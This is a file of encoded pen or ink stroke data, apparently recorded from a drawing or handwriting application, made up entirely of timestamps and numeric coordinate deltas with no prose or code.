20-15,19-20 16,-19 0-1,0 0-15,0 0 16,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14.9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73 5754 0,'19'0'32,"1"0"-17,0 0 1,40 20-16,59 20 15,20 0-15,19-1 16,41-19-16,-40 20 16,19-40-16,21 0 15,-21 0-15,41 0 16,-21 0-16,-119 0 16,140 0-16,-1 0 15,-20 0-15,-39 0 16,40 0-16,-41 0 15,1 0-15,-60 0 16,-19 0-16,-21 0 16,1 0-16,-21 0 15,1 0-15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15.9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137 5814 0,'0'0'0,"19"0"16,1 0 0,20 0-1,59 0 1,40 0-16,40 0 15,19 0-15,-19 0 16,-21 0-16,-38 0 16,-81 0-16,1 0 15,-40-20 17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29.4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856 5695 0,'20'0'16,"-1"0"15,1 0-15,-20 20-16,20-20 16,0 20-1,40-20-15,19 0 16,99 0-16,1 0 15,59 0-15,60 0 16,-20 0-16,19 19 16,21-19-16,-40 0 15,-40 0-15,-20 0 16,-39 0-16,19 0 16,-19 0-16,-40 0 15,-80 0-15,40 0 16,20 0-16,-19 0 15,-41 0-15,-19 0 16,0 0-16,-21 0 16,1 0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2:31.2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7 7693,'18'0,"0"-19,19 19,-19-18,18 18,19 0,-1-18,55 0,-18 18,54 0,18 0,37 0,-1 0,-36 0,110 0,-38 0,1 0,0 0,-36 0,-37 0,-18 0,0 0,-18 0,-54 0,-19 0,1 0,-37 0,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31.3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71 7302 0,'0'0'0,"119"-20"0,-39 1 0,-41 19 31,1 0-31,19 0 16,1 0 0,19 0-16,1 0 15,-1 0-15,40 0 16,0 0-16,80 0 15,-41 0-15,1 0 16,-40 0-16,-39 0 16,118 0-16,0 0 15,1 0-15,-1 0 16,21 0-16,39 0 16,59 0-16,179 0 15,40 0-15,0 0 16,-40 0-16,-159 0 15,-79 0-15,-20 0 16,-79 0-16,-40 0 16,-20 0-16,-19 0 15,-60 0-15,39 0 16,20 0-16,-19 0 16,0-20-16,-1 20 15,-19 0 1,-20 0-16,19 0 15,-19 0 1,20 0-16,-20 0 16,-1 0-16,41 0 15,19-20-15,21 20 16,-1-20-16,20-20 16,-20 40-16,20 0 15,-20-19-15,-59 19 16,39 0-16,21 0 15,-1 0-15,-20 0 16,-39 0-16,0 0 16,-21 0-16,1 0 15,0 0 17,0 0-17,0 0 16,0 0-15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34.7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073 6945 0,'20'-20'78,"0"20"-62,0 0-1,0 0-15,0 0 16,-1 0-16,21 0 15,40 0-15,-1 0 16,0 0-16,21 0 16,58 0-16,-19 0 15,40 0-15,-20 0 16,-21 0-16,21 0 16,0 0-16,-40-20 15,-20 20-15,40 0 16,-59 0-16,39 0 15,-100 0-15,81 0 16,-41 0-16,21 0 16,-21 0-16,-19 0 15,-1 0-15,-19 0 16,20 0-16,-20 0 31,0 0 16,-1 0-31,1 0-1,0 0 1,0 0-16,0 0 16,0 0-16,0 0 15,-1 0 204,1 0-203,0 0-1,40 0-15,-21 0 16,61 0-16,-21 0 15,0 0-15,60 0 16,-99 0-16,99 0 16,-20 0-16,-40 0 15,-19 0-15,-21 0 16,1 0-16,-40 20 16,40-20-16,-20 0 15,-1 0 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36.5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91 8294 0,'20'0'31,"0"0"-16,-1 0-15,61 0 16,79 0-16,-80 0 16,199 0-16,0 0 15,79 0-15,-20 0 16,-19 0 0,-80 0-16,-40 0 15,-79 0-15,20 0 16,0 0-16,20 0 15,-20 0-15,19 0 16,21 0-16,39 0 16,1 0-16,-1 0 15,-39 0-15,-80 0 16,79 0-16,-39 0 16,0 20-16,-40 20 15,1-20-15,-21 20 16,40-40-16,-20 19 15,20-19-15,-39 0 16,-1 0-16,-39 0 16,-20 0-16,-1 0 47,1 0 46,0 0-77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43.6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331 8294 0,'0'0'0,"99"-19"0,60 19 16,-40 0-1,40 0-15,-21 0 0,21 0 16,-99 0 0,59 0-16,20 0 15,-40 0-15,40 0 16,20 0-16,19 0 16,1 0-16,19 0 15,40 0-15,-19 0 16,19 0-16,-60 0 15,41 0-15,-41 0 16,60 0-16,0 0 16,1 0-16,-41 0 15,-119 0-15,160 0 16,-21 0-16,-59 0 16,-1 0-16,-58 0 15,38 0-15,1 0 16,20 0-16,-20 0 15,20 0-15,-40 0 16,20 0-16,0 0 16,-40 0-16,20 0 15,-20 0-15,-19 0 16,39 0-16,-80 0 16,80 0-1,20 0-15,20 0 16,0 0-16,19 0 15,41 0-15,-21 0 16,-39 0-16,0 0 16,-21 0-16,21 0 15,0 0-15,0 0 16,-20 0-16,19 0 16,-19 0-16,-20 0 15,40 0-15,-99 0 16,118 0-16,1 0 15,39 0-15,-39 0 16,-1 0-16,21 0 16,-41 0-16,-39 0 15,20 0-15,0 0 16,-20 0-16,20 0 16,0 0-16,0 0 15,-40 0-15,1 0 16,19 0-16,-80 0 15,41 0-15,-21 0 16,-19 0-16,-20 0 16,0 0-1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1:45.0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51 9684 0,'20'0'47,"40"0"-31,39 0-16,60 0 15,-20 0-15,-1 0 16,-38 0-16,-1 0 16,0 0-16,-59 0 15,-1 0-15,-19 0 16,0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5:45.0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749 5909 0,'53'0'93,"0"0"-77,-36 0-16,19-18 16,-19 18-1,36 0-15,18 0 16,17 0-16,0 0 15,53 0-15,-17 0 16,34 0-16,1 0 16,-35-35-16,34 35 15,-69 0-15,16 0 16,-34 0-16,0 0 16,-36 0-16,18 0 15,-36 0-15,19 0 16,-19 0-16,1 0 15,0 0 1,17 0-16,-17 0 16,-1 0-1,1-18 1,-1 18 171,1 0-171,0 0-16,35 0 16,17 0-1,18 0-15,18 0 16,-53 0-16,0 0 16,-18 0-16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1:49.9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9155 0,'0'17'47,"35"-17"-31,53 18-1,-17 0 1,52-18-16,-17 35 15,-18-35-15,18 17 16,-35-17-16,34 18 16,-16 0-16,17-18 15,-18 17-15,18-17 16,-36 18-16,36-18 16,-35 18-16,-19-1 15,-16-17-15,-1 0 16,0 18-16,1-18 15,-1 0-15,0 0 16,0 18-16,36-18 16,35 17-16,-18-17 15,-17 0-15,34 18 16,-34-18-16,-18 17 16,0-17-16,-18 0 15,0 0-15,1 18 16,-19-18-16,1 0 15,35 0-15,-18 0 16,-17 0-16,-1 0 16,19 0-16,-19 0 15,19 0 1,-19 0-16,54 0 31,-36 0-31,18 0 16,-18 0-16,18 0 15,0 0-15,-18 0 16,18 0-16,35 0 31,-17 0-31,-18 0 0,35 0 16,-17 0-16,17 0 16,18 0-16,-18 0 15,-18 0-15,36 0 16,18 0-16,17 0 15,18 0-15,193 0 32,-211 0-32,1 18 0,16-18 15,19 0-15,-1 0 16,-52 0 0,-1 0-16,0 0 0,1-18 15,-53 0-15,-1 18 16,-17 0-1,-18 0-15,36 0 0,-18 0 16,0 0 0,53 0-1,-54 0-15,-16 0 16,-1 0-16,-17 0 16,17 0-1,-17 0 1,-1 0-16,1 0 15,-1 0 1,19 0 0,-1 0-16,18 0 15,-18 0-15,18 18 16,-35-18-16,17 0 16,-17 0-16,-1 0 15,19 0 126,34 18-141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1:54.0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10901 0,'0'0'0,"17"0"31,1 0 16,-1 0-32,1 0-15,0 0 16,17 0-16,0 0 16,18 0-16,0 0 15,0 0-15,0 0 16,18 0-16,-1 0 15,1 0-15,-1 0 16,18 0-16,-52 0 16,17 0-16,-1 0 15,1 0-15,0 0 16,0 0-16,35 17 16,1 1-16,69 17 15,-52-35-15,18 18 16,-18 0-16,-18-18 15,18 0 1,-54 0-16,1 0 0,0 0 16,0 17-16,0-17 15,18 0 1,-1 0-16,71 18 0,-35 0 16,71-1-16,-1 18 15,-35-35 1,-53 0-16,18 0 15,-53 0-15,0 0 16,0 0 0,0 0-16,17 0 0,1 0 15,-1 0-15,54 0 16,35 0-16,35 0 16,17 0-16,-52 0 15,-18 0-15,36 0 16,-72 0-16,37 0 15,-37 0-15,-16 0 16,34 0-16,-35 0 16,18 0-16,-18 0 15,36 0-15,17 0 16,0 18-16,35 0 16,-35-1-16,-17 1 15,17 0 1,0 17-16,-35-17 0,-18-18 15,-17 0-15,-1 0 16,-17 0 0,0 0-16,-18 0 15,18 0-15,-17 0 16,-1-18-16,0 0 16,71 1-1,-53 17-15,0-18 16,0 18-16,-18 0 15,18 0-15,-35 0 16,-1 0-16,1 0 16,17 0-1,-17 0 1,-1 0-16,1 0 16,0 0-16,-1 0 15,1 0 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2:52.1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030 10918 0,'0'0'0,"-18"0"16,0 0 62,36 36-63,70-19-15,53 19 16,0 17 0,71-36-16,53 1 0,88-18 15,140 53-15,54-36 16,-18 19-1,-141-36-15,-52 0 0,-72 0 16,-52 0-16,-36 0 16,18 0-1,-35 0-15,-18 0 0,-35 0 16,-53 0 0,0 0-16,-18 0 15,-17 0 1,17 0-1,-17 0 1,-18 17 0,0 1-1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35:55.8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35 9278 0,'18'18'46,"-1"-18"-46,1 0 16,35 0-16,17 0 16,1-18-16,52 0 15,1 1-15,52-1 16,18-17-16,18 17 16,70 18-1,53 0-15,0 0 0,1 0 16,105 0-1,-18 0-15,71 0 0,-71 0 16,-123 0 0,-53 0-16,35 0 15,-88 0-15,0 0 16,-53 0-16,-35 0 16,0 0-16,-35 0 15,-36 0-15,-18 0 16,1 0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2:42.1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321 7021,'0'-18,"18"18,1-18,17 18,0 0,-18 0,19 0,35 0,19 0,18 0,18 0,18 0,36 0,19 0,-1 0,55 0,37 0,-19 0,-36 0,-19 0,19 0,36 0,-54 0,0 0,18 0,-19 0,-35 0,17 0,-53 0,17 0,18 0,-36 0,-36 0,73 0,-19 0,18 0,1 0,-1 0,19 0,18 18,36 18,-91-36,0 0,0 19,1-19,-19 0,0 0,-18 0,18 0,0 0,-36 0,-18 0,0 0,-19 0,-17 0,-19 0,-18 0,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35:57.5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08 1887 0,'0'-17'15,"18"17"1,-1-18 0,19 18-16,-1-18 15,18 1-15,0-1 16,35 18-16,0-35 15,53 17 1,-35 18-16,18-17 16,-1 17-16,36-18 15,35 18-15,17 0 16,36 0-16,36 0 16,-19 0-16,54 0 15,70 0-15,-53 0 16,194 0-16,-106 0 15,-35 0-15,106 0 16,-159 0-16,1 0 16,-1 0-16,-106-18 15,18-17 1,-35 35-16,-1 0 16,-52 0-16,-18 0 15,0 0-15,-17 0 16,-54 0-16,19 0 15,-4111 0 1,8149 0-16,-4038 0 16,-1 0-16,70 35 15,1-35-15,53 18 16,0 0-16,17-18 16,35 0-16,19 0 15,-19 0-15,-17 0 16,-53 0-16,18 0 15,-71 0-15,-53 0 16,-53 0-16,-17 0 16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3:05.6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58 7759 0,'19'0'109,"1"0"-93,60 0-16,58 0 15,81 0-15,-21-20 16,40 20-16,60 0 16,-40 0-16,20 0 15,59 0-15,-19 0 16,59 0-16,-40 0 16,-79 0-16,-99 0 15,158 0-15,-19 0 16,-20 0-16,-1 0 15,-58 0-15,19 0 16,-20 0-16,0 0 16,-39 0-16,0 0 15,-40 0 1,-60 0-16,0 0 16,-19 0-16,-20 0 15,-21 0 1,1 0 15,0 0-15,0 0-16,0 0 15,19 0-15,21 0 16,-1 0-16,1 0 16,39 0-16,-19 0 15,58 0-15,-58 0 16,19 0-16,-39 0 15,-41 0-15,41 0 16,-20 0-16,-20 0 16,-1 0 15,1 0-31,0 0 0,20 0 16,-1 0-16,1 0 15,40 0 1,-1 0-16,40 0 15,-99 0-15,79 0 16,-20 0-16,-39 0 16,20 0-16,-41 0 15,21 0-15,-20 0 16,20 0 0,-21 0-1,1 0 1,0 0-16,0 0 15,0 0 1,20 0 0,-21 0-16,1 0 15,0 0-15,20 0 16,-20 0-16,19 0 16,-19 0-16,40 0 15,-21 0-15,-19 0 16,0 0-16,20 0 15,-20 0-15,-1 0 16,1 0-16,40 0 16,-40 0-16,19 0 15,1 0-15,-20 0 16,20 0-16,-21 0 16,41 0-16,-20 0 15,-1 0 1,-19 0-16,0 0 15,0 0-15,0 0 16,0 0 109,-1 0-125,41 0 16,-20 0-1,-1 0-15,41 0 16,59 0-16,19 20 16,-19-20-16,-20 19 15,20-19-15,-20 0 16,-59 0-16,-21 0 15,-19 0 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3:07.5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07 7739 0,'19'0'62,"61"0"-62,39 0 16,40 0-16,-1 0 15,21 0-15,0 0 16,59 0-16,-40 0 16,1 0-16,-1 0 15,-39 0-15,-1 0 16,-58 0-16,-1 0 16,20 0-16,-20 0 15,20 0-15,-59 0 16,-21 0-1,41 0-15,-1 0 16,1 0-16,-21 0 16,20 0-16,-39 0 15,20 0-15,-1 0 16,1 0-16,-21 0 16,21 0-16,19 0 15,-19 0-15,19 0 16,40 0-16,-19 0 15,19 0-15,-40 0 16,-39 0-16,39 0 16,0 0-16,1 0 15,-41 0-15,21 0 16,0 0-16,-1 0 16,20 0-16,1 0 15,-21 0-15,1 0 16,-1 0-16,-19 0 15,0 0-15,0 0 16,-21 0 0,21 0-16,-20 0 15,0 0 17,0 0-32,-1 0 46,1 0-14,0 0-17,0 0 1,0 0 0,0 0-1,-1 0 32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3:16.3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89 4286 0,'40'0'62,"59"0"-62,-39 0 16,138 0-16,100 0 15,19 0-15,60 0 16,-39 0-16,-61 0 16,-19 0-16,-39 0 15,-41 0-15,-39 0 16,-20 0-16,-20 0 16,-19 0-16,39 0 15,-20 0-15,60 0 16,-20 0-16,20 0 15,-100 0-15,80 0 16,0 0-16,-40 0 16,-20 0-16,-19 0 15,-40 0-15,0 0 32,0 0 46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8:19.3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37 4921 0,'0'20'110,"0"0"-95,20-20 48,0 0-48,39 0 1,1 20-16,19-20 16,1 0-16,19 0 15,-40 0-15,41 0 16,19 0-16,-40 0 16,20 0-16,-59 0 15,20 0-15,-21 0 16,1 0-16,0 0 15,-1 0-15,-19 0 16,40 0-16,-21 0 16,1 0-16,20 0 15,-1 0-15,20 39 16,21-19-16,-41-20 16,21 0-16,-61 0 15,21 0-15,-20 0 16,0 0-1,0 0-15,-1 0 16,1 0 0,20 0-1,0 0 1,-1 0-16,21 0 16,19 0-16,-19 0 15,19 0-15,1 0 16,-21 0-16,-39 0 15,20 0-15,-20 0 16,-1 0 0,1 0-16,0 0 93,0 0-77,0 0-16,0 0 16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8:21.1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244 5159 0,'20'0'47,"0"0"-32,0 0 1,19 0 0,21 0-1,-1 0 1,21 0-16,-1 0 16,-39 0-16,39 0 15,1 0-15,-1 0 16,20 0-16,20 0 15,60 0-15,-20 0 16,-20 0-16,-40 0 16,20 20-16,-40 0 15,1 19-15,-21-39 16,-19 0-16,-20 0 16,0 0 15,-1 0-31,1 0 15,0 0-15,0 0 16,0 0-16,0 0 16,-1 0-1,1 0 1,0 0-16,0 0 16,0 0-16,0 0 15,0 0 1,-1 0-16,21 0 15,-20 0 1,39 0 0,1 0-16,19 40 15,21-40-15,-41 0 16,1 0-16,-21 0 16,1 0-16,-20 0 15,0 0-15,-1 0 16,1 0-16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8:26.8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443 6171 0,'19'20'63,"41"0"-47,-40-20-16,79 0 15,60 0-15,19 0 16,61 0-16,38 0 15,-58 0-15,-1 0 16,20 0-16,-59 0 16,-21 0-16,1 0 15,-20 0-15,0 0 16,0 0 0,-40 0-16,40 0 15,20 0-15,0 0 16,-100 0-16,80 20 15,40-20-15,-60 39 16,-60-19-16,-19 0 16,19-20-16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8:28.9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07 6251 0,'20'0'63,"19"19"-63,100 1 15,40-20 1,59 40-16,99 39 15,1-59-15,59 0 16,-259 0-16,160-20 16,-40 0-16,-40 0 15,-99 0-15,1 0 16,-61 0-16,1 0 16,-21 0-16,1 0 15,19 0-15,-19 0 16,0 0-16,0 0 15,-21 0 1,1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-16,0 0 15,0 0-15,0 0 16,20 0-16,-21 0 16,1 0-16,0 0 15,0 0 1,20 0-16,39 0 16,-19 0-16,-21 0 15,21 0-15,-1 0 16,-19 0-16,0-20 15,19 0-15,-19 20 16,0 0-16,19-59 16,-19 59-16,19-20 15,1 20-15,19 0 16,1 0-16,-21 0 16,-39 0-1,0 0 32,0 0-47,-20-20 16,19 20-1,1 0 1,-20-20 0,20 20-1,0 0-15,0 0 31,0 0-15,0 0 0,19 0-16,-19 0 15,40 0-15,-1 0 16,-19 0-16,0 0 16,-1 0-1,-19-20 1,0 0-1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04.5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224 7302 0,'0'20'78,"0"0"-31,60-20-47,-1 0 16,41 0-16,-1 0 0,20 0 15,20 0 1,-40 0-16,-20 0 16,-39 0-16,0 0 15,0 0-15,-21 0 16,1 0 0,0 0-1,0 0-15,0 0 16,0 0-1,-1 0-15,1 0 157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05.7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98 7461 0,'19'0'94,"61"0"-94,-41 0 16,120 0-16,40 0 15,59 0-15,79 0 16,-20 0-16,21 0 15,-80 0-15,-20 0 16,-60 0-16,-78 0 16,-41 0-1,-19 0-15,-20 0 219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17.4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68 12101,'18'0,"0"0,19 0,17 0,-18 0,-17 0,17 0,0 0,0 0,73 0,-36 37,72-19,0 0,37 0,-19-18,36 0,-35 18,35-18,1 0,-1 0,-17 0,54 0,-37 0,19 18,-55 19,19-37,17 0,1 0,36 0,18 0,-18 0,-55 0,19 0,-1 0,-54 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,-18 0,19 0,-38 0,38 0,-19 0,0 0,0 0,-37 0,1 0,36 0,-18 0,-37 0,-17 0,-1 0,1 0,-19 0,-18 0,0 0,19 0,-19 0,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16.6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324 8533 0,'39'-20'31,"-19"20"-31,59 0 16,60 0-16,-20 0 15,40 0-15,60 0 16,-81 0-16,41 0 16,0 0-16,59 0 15,-40 0-15,-138 0 16,98 0-16,21 0 16,-20 0-16,-80 0 15,-19 0-15,-1 0 16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20.1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328 9564 0,'20'0'156,"0"0"-156,19 0 16,-19 0 0,0 0-16,0 0 15,19 0-15,-19 0 16,0 0-16,0 0 15,0 0-15,0 0 16,-1 0 31,1 0-16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30.7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06 10457 0,'40'0'109,"0"0"-109,19 0 16,1 0-1,19 0-15,1 0 16,-1 0-16,-59 0 15,59 0-15,-39 0 16,0 0-16,-21 0 16,1 0 15,-20-19-15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32.7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73 9664 0,'20'0'62,"0"20"-46,19-1-16,1-19 15,39 0-15,40 0 16,1 0-16,-1 0 16,20 0-16,-40 0 15,0 0 1,-20 0-16,-39 0 16,20 0-16,-21 20 15,1-20-15,-20 20 16,0-20-16,-1 0 15,1 0 1,-20 20 0,20-20 14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33.5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50 11747 0,'20'0'32,"0"20"-17,39-20-15,21 40 16,98-20-16,21-20 16,19 0-16,60 0 15,0 0-15,-1 0 16,-39 0-16,-178 0 15,79 0-15,-60 0 16,-39-20-16,-40 0 16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35.8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030 11450 0,'20'0'63,"0"0"-48,20 0 1,39 0-16,60 0 16,20 0-1,59 0-15,-20 0 0,1 0 16,-41 0 0,-38 0-16,-41 0 15,-20 0-15,-19 0 16,-20 0-1,0 0 1,0 0-16,0 0 219,-20 19-172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39.4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165 11430 0,'20'0'125,"19"0"-109,1 0-16,20 0 15,-1 0 1,1 0-16,-21 0 15,21 0-15,-1 0 0,41 0 16,-21 0 0,-59 0-16,59 0 15,1 0-15,-1 0 16,-19 0-16,-1 0 16,1 0-16,-21 0 15,21 0-15,-1 0 16,1 0-16,-20 0 15,19 0-15,20 0 16,21 0-16,19 0 16,0 0-16,0 0 15,-20 0-15,-59 0 16,59 0-16,20 0 16,-79 0-16,-1 0 15,-19 0-15,0 0 16,20 0-1,-40-20 1,39 20-16,1 0 16,0 0-16,0 0 15,-21 0-15,21 0 16,-20 0-16,0 0 16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39:42.9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296 12065 0,'20'0'47,"0"0"-47,39 0 15,21 0 1,58 39-16,21 21 16,59 19-16,100 1 15,-40 19-15,79-20 16,-139-39-16,-39 0 16,-100-1-16,-19-39 15,-21 20-15,1 0 16,-20-20-16,0 0 15,20 0-15,-21 0 16,1 0-16,20 0 16,-20 0-16,0 0 15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06.5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462 13156 0,'40'0'125,"79"0"-110,40 0-15,-119 0 16,79 0-16,59 0 16,1 0-16,19 0 15,-39 0-15,0 0 16,-20 0 0,-40 0-16,0 0 0,0 0 15,-19 0-15,19 0 16,-39 0-1,19 0-15,0 0 16,-19 0-16,19 0 16,-19 0-16,-40 0 15,39 0-15,1 0 16,-1 0-16,1 0 16,-40 0-1,-1 0-15,1 0 281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13.7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582 14267 0,'59'0'125,"60"0"-109,40 0-16,39 0 15,80 0-15,0 20 16,20 0-16,-40 0 15,39 0-15,-39-20 16,-79 20-16,19-20 16,-118 0-16,-41 0 15,-19 0 1,0 0-16,0 0 156,0 0-14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19.5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57 15077,'18'0,"0"0,1 0,-1-18,0 18,18 0,19 0,-1 0,37 0,54 0,-36 0,108 0,56 0,-19 0,54 0,127 0,55 0,109 0,-55 0,1 0,-1 0,-54 0,108 18,-90-18,-18 0,-199 0,17 0,-54 0,0 0,-54 0,-55 0,0 0,-18 0,-73 0,1 0,-37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16.3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57 14248 0,'20'0'16,"0"0"-1,39 0-15,-19 0 16,-20 0-16,99 0 15,40 0-15,59 39 16,0-19-16,20 0 16,-39-20-16,-1 0 15,-39 0-15,-60 0 16,-20 0-16,-19 0 16,0 0-16,-41 0 15,1 0 1,0 0-1,0 0 1,0 0 15,0 0 1,-1 0 108,1 0-109,0 40-31,0-40 16,20 39-16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35.1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13 15756 0,'0'20'32,"0"19"-17,0 1-15,20-20 0,0 0 16,0-20 15,0 0-31,19 0 16,41 0-16,39 0 15,40 0-15,-1 0 16,41 0-16,-40 0 16,-1 0-16,-19 0 15,-20 0-15,-39 0 16,19 0-16,-40 0 15,21 0-15,-40 0 16,39 0-16,40 0 16,-40 0-16,-19 19 15,-40-19-15,0 0 16,-1 0-16,1 0 62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36.4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645 15279 0,'20'0'62,"0"0"-46,0 0-16,39 0 16,1 0-16,-1 0 15,1 0-15,-1 20 16,-19-20-16,-20 0 15,0 0-15,0 0 11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0:37.3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26 16133 0,'20'0'47,"0"0"-47,0 0 16,59 0-16,-19 0 15,39 0-15,20 0 16,-40 0-16,1 0 16,-21 0-16,-19 0 15,0 0-15,-21 0 16,1 0 0,0 0-1,0 0 1,20 0-16,-20 0 15,-1 0 1,1 0 15,0 0-15,0 0 15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2:46.7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11 5461,'18'0,"18"0,19 0,17 0,19 0,54 0,0 0,-36 0,-36 0,18 0,-37 0,-18 0,1 0,-19 0,0 0,-18 18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2:47.6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11 5715,'0'18,"0"0,-18 0,0 19,0 17,-19 1,19 17,-18 1,0-55,36 36,0-17,0-19,0 0,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2:59.5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332 6640,'0'18,"0"1,0 17,0 0,0 0,0 37,0 18,0-19,0 37,0-36,0-19,0 1,0-1,0-36,0 18,0 1,0-19,0 0,0 0,0 0,-18-18,18 37,0-1,-18-36,18 36,0-18,0 37,-19-37,19 0,-18 0,18 0,0 0,-18-18,-18 0,18 0,-37 0,1 0,-19 0,-36-36,37 0,-37 0,-54-1,72 19,18 18,19 0,0-18,17 18,1 0,0 0,18 0,-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3:05.0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60 8092,'18'0,"19"0,17 18,55 0,18-18,36 54,37-35,-37-1,37-18,-19 36,-18-36,37 0,-55 0,-18 36,-36-36,36 0,-36 0,-37 0,-18 0,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4:10.1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21 2631,'0'36,"0"0,-37 19,-17-19,-19 37,-35 17,-1-17,18-1,-36-35,-18-1,-18 18,36 1,-55-1,55-17,55 17,-1 0,-18 1,19-19,17 19,37-1,0-18,18 19,0-1,18 1,55 35,54 19,18-18,36-19,19 74,36-38,-37 1,73-36,-72-37,0-36,-19 18,0-18,-35 0,-56 0,-17-36,-19 18,-36-37,19 1,-19 0,-18-1,18-17,0-37,-18 18,0-36,0 0,0 18,-109-36,37 0,-73-37,36 37,-55 18,37 0,19 18,17 19,36 35,19 37,0-18,18 36,0-18,-1 18,1 0,0 0,0 0,-55 36,37-18,-18 18,-19 19,19 17,-37 19,0 0,1 18,17-19,-18 56,37 17,36 73,0 0,18-37,0 91,0-54,0-18,0 54,0-36,0-18,0-55,36 37,-18-73,0-37,-18-53,0-19,18-18,0 0,1 0,17-37,18 1,37-55,18-17,36-38,0-35,-18-19,55-17,35-164,37-55,37-90,-19-36,-73 126,-17 110,-37 54,-36-1,-37 74,-35-1,17 73,-36 18,0 55,0 18,-18 18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1:56.9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65 4901 0,'20'0'16,"19"0"0,21 0-1,-20 0-15,19 0 16,60 0-16,-39 0 16,-1 0-16,-20 0 15,1 0-15,-20 0 16,-20 0-16,-1 0 15,1 0 1,0 0 1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7:17.7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51 345,'0'0,"-54"0,-37 0,-36 0,-36 0,-37 18,1 73,-19 36,-36 18,36 36,19-18,-128 110,91-1,-54-36,127-19,0-35,72-55,18 36,1-72,54-37,18 37,54 0,55 17,0-17,0 18,199 72,109 19,37-55,108 91,-163-127,1 0,-38-55,-144-54,54 0,-90 18,-37-18,18-36,-108-37,-1-17,-36-1,0-36,-18-54,-90 17,-1-17,-91-128,-17 1,-128-127,-17 54,35 54,1-72,-73 54,145 73,54 91,-53-37,35 109,-36 109,55 0,17 0,37 0,-18 0,36 0,19 0,35 0,19 0,-18 54,-19 55,19 18,-37 73,36-1,-35 92,17-1,1 37,-1-37,0 91,19 0,18-109,18 0,18-18,0-72,0-92,0 1,36-73,-18 0,0-18,0 0,19 0,35-18,1-54,36-37,54-55,0-17,19-91,17-18,73-200,-72 18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1:58.0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70 5358 0,'19'0'16,"1"0"-1,0 0 1,-20 19-16,20-19 16,-20 20-16,20 0 15,0-20 1,-1 0-16,21 0 16,-20 0-16,0 0 15,0 0-15,0 0 16,-1 0-16,21 0 15,20 0-15,-1 0 16,1 0-16,39 0 16,-20 0-16,1 0 15,-21 0-15,1 0 16,-21 0-16,-19 0 16,0 0-16,20 0 15,-20 0 1,19 0-1,-19 0 1,0 0-16,0 0 16,19 0-16,-19 0 15,0 0 1,0 0 62,0 0-15,0 0-32,0 0 31,-1 0-46,1 0 15,0 0-15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2:35.0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87 16510 0,'20'0'110,"0"0"-110,0 0 15,39 0-15,41 0 16,-21 0-16,40 0 16,-20 0-16,20 0 15,-79 0-15,20 0 16,-1 0-16,1 0 15,-1 0-15,-19 0 16,19 0-16,-19 0 16,39 0-16,-19 0 15,19 0 1,1 0-16,-1 0 16,0 0-16,41 0 0,-61 0 15,40 0 1,-19 0-16,-1 0 15,-59 0-15,79 0 16,-39 0-16,-1 0 16,-19 0-16,19 0 15,-19 0-15,0 0 16,-1 0-16,-19 0 16,0 0-16,0 0 15,0 0-15,20 0 16,-21 0-16,1 0 15,20 0-15,0 0 16,-1 0-16,21 0 16,-21 0-16,1 0 15,-20 0-15,0 0 16,20 0-16,-21 0 16,1 0-16,20 0 15,-20 0-15,19 0 16,1 0-16,-20 0 15,0 0-15,0 0 32,-1 0 15,1 0-16,0 0-16,0 0 1,0 0 0,0 0 15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21:20.2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94 5139 0,'-20'0'0,"0"20"31,20 20-31,-20 19 16,-20 21-16,1 19 15,19 20-15,-20 20 16,0 0-16,-39 0 16,39 39-16,-19-19 15,-1 0-15,60 39 16,-19-39-16,19 59 16,0-138-16,0 158 15,0-40-15,0 1 16,0-21-16,0-39 15,0 40-15,0-40 16,0-20-16,0 20 16,-40-20-16,20-40 15,-20 100-15,40-140 16,-20 100-16,1 20 16,-1 20-16,20 19 15,0-79-15,0 0 16,-20-59-1,20-40-15,0 19 16,0 21-16,0-21 16,0 21-16,0-20 15,0-21-15,0 1 16,0 20-16,0 0 16,0-20-16,0-1 15,0 1-15,0 20 16,0 0-1,0-1-15,0 21 16,0-20-16,0 39 16,0-20-16,0 1 15,0 0-15,0-1 16,0-39-16,0 20 16,0-1-16,0 1 15,0-20-15,0 19 16,0-19-16,0 0 47,20-20-32,0 20 1,19-20 0,21 20-16,19 20 15,40-1-15,20 21 16,40-21-16,-21 21 15,21-20-15,39 19 16,-19-19-16,-21-20 16,-59-20-16,-39 0 15,-40 0-15,-21 0 16,1 0-16,0 0 16,0 0-1,0 0 1,0 0-1,-1-20 1,-19 0 0,20 20-16,0-20 15,-20 0 1,20-19 0,-20 19-16,20 0 15,-20-20-15,20-19 16,19-1-16,-19-59 15,20-40-15,0-59 16,-40-40 0,0-40-16,0 21 0,0-21 15,0 199-15,0-119 16,0-21 0,0 41-16,0-20 15,0 39-15,19-39 16,-19 19-16,0 21 15,0-21-15,0 21 16,0 19-16,0-20 16,0 140-16,0-120 15,0 40-15,0-20 16,0 0-16,0-20 16,0 20-16,0 20 15,0-20-15,0 1 16,0-1-16,0 20 15,0-20-15,0 99 16,0-79-16,0-20 16,0 60-16,0-1 15,0 21-15,0 19 16,0 20-16,0 0 109,-19 20-77,-41-39-32,-39 39 15,-60-40-15,20-39 16,-119 79-16,20 0 15,-40 0-15,20 0 16,80 0-16,-41 0 16,100 0-16,20 0 15,59 0-15,21 0 16,-1 0-16,0 0 16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20.4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02 4198 0,'0'-18'63,"35"18"-16,-17 0-32,-1 0-15,1 0 32,0 0-17,-1 0-15,18 0 16,1 0-16,17 0 15,-18 0-15,0 0 16,0 0 0,-17 0-1,0 0 17,-1 0-17,1 0 1,0 0-16,17 18 15,0-18-15,18 0 16,0 0-16,18 18 16,17-1-16,-18-17 15,54 18-15,35 0 16,-18-1-16,0 1 16,-18 17-16,1-35 15,-18 0-15,-36 0 16,-17 0-16,-18 0 15,1 0-15,-1 0 16,-18 0-16,1 18 63,17-18-48,-17 17 1,0-17-1,-1 0 1,1 0 15,0 0 63,-1 0-94,19 0 16,-1-17-16,0 17 15,18-18-15,35 18 16,71-35-16,53 35 16,-36 0-16,0 0 15,-35 0-15,-35 0 16,-53 0-16,18 0 15,-36 0-15,18 0 16,-35 18 0,17-1-16,18 1 15,-36-1-15,-34-17 157,-18 0-142,-1 0 1,19 0-16,-1 0 15,0 0-15,-35 0 16,36 0-16,-1 0 16,1 0-1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25.0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69 4092 0,'0'0'0,"36"18"16,-19-18-1,19 0 1,17 0-16,35 18 16,-35-18-16,17 0 15,-34 0-15,-19 0 16,1 0 0,-1 17 15,1-17-16,0 18 48,-1-1-32,1-17-15,17 0-1,-17 0 1,0 0-16,-1 0 0,1 0 31,17 0-15,-17 0 0,-1 0-1,1 0 48,-36-17-48,1 17 1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27.3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380 4216 0,'17'0'125,"19"0"-125,34 0 16,54 